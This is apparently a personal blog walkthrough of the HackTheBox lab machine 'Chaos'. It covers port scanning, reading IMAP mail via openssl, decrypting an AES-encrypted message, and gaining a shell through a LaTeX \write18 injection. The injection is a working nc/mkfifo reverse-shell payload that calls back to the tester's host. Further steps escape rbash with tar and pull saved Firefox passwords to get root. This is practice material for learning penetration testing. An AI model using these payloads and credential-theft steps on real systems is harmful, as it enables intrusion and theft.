HackTheBox - Chaos | Shubham Kumar

Summary

Chaos,a Linux box created by HackTheBox user felamos, was an overall simple medium-difficulty box.This box surrounded around credentials reuse and had a little exploitation.It taught me how to use openssl to connect to a mail server and read mails without any mail client.It also taught me little about working with Latex.Root in this box was pretty simple you just had to find and extract the password from Firefox saved password

Enumeration

nmap Scan

1	$ nmap -sC -sV 10.10.10.120

Results:

# Nmap 7.70 scan initiated Fri Mar  1 12:22:35 2019 as: nmap -sC -sV 10.10.10.120
Nmap scan report for chaos.htb (10.10.10.120)
Host is up (0.15s latency).
Not shown: 991 closed ports
PORT      STATE    SERVICE  VERSION
80/tcp    open     http     Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Chaos
110/tcp   open     pop3     Dovecot pop3d
|_pop3-capabilities: PIPELINING TOP SASL RESP-CODES AUTH-RESP-CODE UIDL STLS CAPA
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
143/tcp   open     imap     Dovecot imapd (Ubuntu)
|_imap-capabilities: LOGIN-REFERRALS LOGINDISABLEDA0001 more have STARTTLS post-login listed IDLE capabilities Pre-login ID IMAP4rev1 OK SASL-IR LITERAL+ ENABLE
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
144/tcp   filtered news
993/tcp   open     ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: LOGIN-REFERRALS more have post-login listed capabilities IDLE OK Pre-login ENABLE IMAP4rev1 AUTH=PLAINA0001 SASL-IR LITERAL+ ID
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
995/tcp   open     ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
5100/tcp  filtered admd
9618/tcp  filtered condor
10000/tcp open     http     MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar  1 12:23:46 2019 -- 1 IP address (1 host up) scanned in 71.36 seconds

nmap finds 80/tcp, 110/tcp, 143/tcp, 993/tcp, 995/tcp, and my oh my 10000/tcp open. Lets start with port 80.

Opening the page we see

lets add chaos.htb to the /etc/hosts

1	10.10.10.120 chaos.htb

Adding that and visiting the website

we see nothing interesting.

We used the gobuster on http://chaos.htb, but it was not successful. We then decided to give it a go at just the IP address.

Here we got lucky. An URL 10.10.10.120/wp/ was found. When browsing through it, we found a password restricted page (not login). All we had to do was to find this password.

After much guessing, the password is human.

we get the creds for Webmail as ayush:jiujitsu

Web-mail

Let’s verify the webmail credentials with IMAPS. IMAPS seem to be more likely to be powering webmail. We can use openssl s_client, very much like nc, to connect to SSL-enabled services.

1	openssl s_client -crlf -connect 10.10.10.120:993

We are able to login to the Web mail with the credentials we found.
Let’s LIST the mail boxes.

The only mail exists in Drafts.

Lets Read That Mail.

a FETCH 1 BODY[]
* 1 FETCH (BODY[] {2532}
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="=_00b34a28b9033c43ed09c0950f4176e1"
Date: Sun, 28 Oct 2018 17:46:38 +0530
From: ayush <ayush@localhost>
To: undisclosed-recipients:;
Subject: service
Message-ID: <7203426a8678788517ce8d28103461bd@webmail.chaos.htb>
X-Sender: ayush@localhost
User-Agent: Roundcube Webmail/1.3.8

--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII;
 format=flowed

Hii, sahay
Check the enmsg.txt
You are the password XD.
Also attached the script which i used to encrypt.
Thanks,
Ayush

--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: application/octet-stream;
 name=enim_msg.txt
Content-Disposition: attachment;
 filename=enim_msg.txt;
 size=272

MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9
RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M
7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e
6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge
+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08=
--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: text/x-python; charset=us-ascii;
 name=en.py
Content-Disposition: attachment;
 filename=en.py;
 size=804

ZGVmIGVuY3J5cHQoa2V5LCBmaWxlbmFtZSk6CiAgICBjaHVua3NpemUgPSA2NCoxMDI0CiAgICBv
dXRwdXRGaWxlID0gImVuIiArIGZpbGVuYW1lCiAgICBmaWxlc2l6ZSA9IHN0cihvcy5wYXRoLmdl
dHNpemUoZmlsZW5hbWUpKS56ZmlsbCgxNikKICAgIElWID1SYW5kb20ubmV3KCkucmVhZCgxNikK
CiAgICBlbmNyeXB0b3IgPSBBRVMubmV3KGtleSwgQUVTLk1PREVfQ0JDLCBJVikKCiAgICB3aXRo
IG9wZW4oZmlsZW5hbWUsICdyYicpIGFzIGluZmlsZToKICAgICAgICB3aXRoIG9wZW4ob3V0cHV0
RmlsZSwgJ3diJykgYXMgb3V0ZmlsZToKICAgICAgICAgICAgb3V0ZmlsZS53cml0ZShmaWxlc2l6
ZS5lbmNvZGUoJ3V0Zi04JykpCiAgICAgICAgICAgIG91dGZpbGUud3JpdGUoSVYpCgogICAgICAg
ICAgICB3aGlsZSBUcnVlOgogICAgICAgICAgICAgICAgY2h1bmsgPSBpbmZpbGUucmVhZChjaHVu
a3NpemUpCgogICAgICAgICAgICAgICAgaWYgbGVuKGNodW5rKSA9PSAwOgogICAgICAgICAgICAg
ICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBlbGlmIGxlbihjaHVuaykgJSAxNiAhPSAwOgog
ICAgICAgICAgICAgICAgICAgIGNodW5rICs9IGInICcgKiAoMTYgLSAobGVuKGNodW5rKSAlIDE2
KSkKCiAgICAgICAgICAgICAgICBvdXRmaWxlLndyaXRlKGVuY3J5cHRvci5lbmNyeXB0KGNodW5r
KSkKCmRlZiBnZXRLZXkocGFzc3dvcmQpOgogICAgICAgICAgICBoYXNoZXIgPSBTSEEyNTYubmV3
KHBhc3N3b3JkLmVuY29kZSgndXRmLTgnKSkKICAgICAgICAgICAgcmV0dXJuIGhhc2hlci5kaWdl
c3QoKQoK
--=_00b34a28b9033c43ed09c0950f4176e1--
)
a OK Fetch completed (0.002 + 0.000 + 0.001 secs).

We get two files and the message saying you are the password to sahay.

Observing the en.py we see it is a AES/CBC encryption with the key as SHA256 of sahay

def encrypt(key, filename):
    chunksize = 64*1024
    outputFile = "en" + filename
    filesize = str(os.path.getsize(filename)).zfill(16)
    IV =Random.new().read(16)

    encryptor = AES.new(key, AES.MODE_CBC, IV)

    with open(filename, 'rb') as infile:
        with open(outputFile, 'wb') as outfile:
            outfile.write(filesize.encode('utf-8'))
            outfile.write(IV)

            while True:
                chunk = infile.read(chunksize)

                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += b' ' * (16 - (len(chunk) % 16))

                outfile.write(encryptor.encrypt(chunk))

def getKey(password):
            hasher = SHA256.new(password.encode('utf-8'))
            return hasher.digest()

we write the decrypt function to get the message.

from Crypto.Cipher import AES
from Crypto.Hash import SHA256

chunksize = 64*1024

password = "sahay"
key = SHA256.new(password.encode('utf-8')).digest()

msg = ""
with open('enim_msg.txt') as f:
	f.read(16) #filesize
	iv = f.read(16)
	cipher = AES.new(key, AES.MODE_CBC, iv)
	while True:
		chunk = f.read(chunksize)
		if not chunk:
			break
		msg += cipher.decrypt(chunk)

print msg

Running the decrypt script give us a base64 encoded message decoding it we see the message to be:

Hii Sahay

Please check our new service which create pdf

p.s - As you told me to encrypt important msg, i did :)

http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3

Thanks,
Ayush

Low-Privilege Shell

If we access we’ll get the following website. creating a test pdf

We can detect the page is using pdfTeX as compiler, an extension of TeX typography and there are many ways to abuse this language. I used the following payload which will execute nc and create a reverse shell.

\immediate\write18{rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.12 9000 >/tmp/f|base64 > test.txt}\newread\file\openin\file=test.txt\loop\unless\ifeof\file\read\file%20to\fileline\text{\fileline}\repeat\closein\file

listening on that port we get the Reverse shell.

nc -nlvp 9000
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::9000
Ncat: Listening on 0.0.0.0:9000
Ncat: Connection from 10.10.10.120.
Ncat: Connection from 10.10.10.120:45438.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

Privilege Escalation

Now, let’s see if we can su ourselves to ayush with the password jiujitsu obtained earlier. Bingo
we get escalated to ayush but we see we are in rbash and have access to dir,ping and tar
We can use tar to escape the rbash as gtfobins

1	tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

and after exporting path to PATH=/bin:/usr/bin:$PATH

we can now read user.txt.

Moving to Root.

We also see that there is .mozilla folder in ayush home directory. downloading it locally and observing.

we see that there is cred for Webmin(port 10000). Lets try decrypting that using Firefox Decrypt and as its ayush profile we can assume the password might be jiujitsu and bingo its that.

Master Password for profile /home/ayush/.mozilla/firefox/bzo7sjt1.default: jiujitsu


Website:   https://chaos.htb:10000
Username: 'root'
Password: 'Thiv8wrej~'

This gave us the password for root. With this we can su to root and retrieve root.txt

And we completed chaos with this.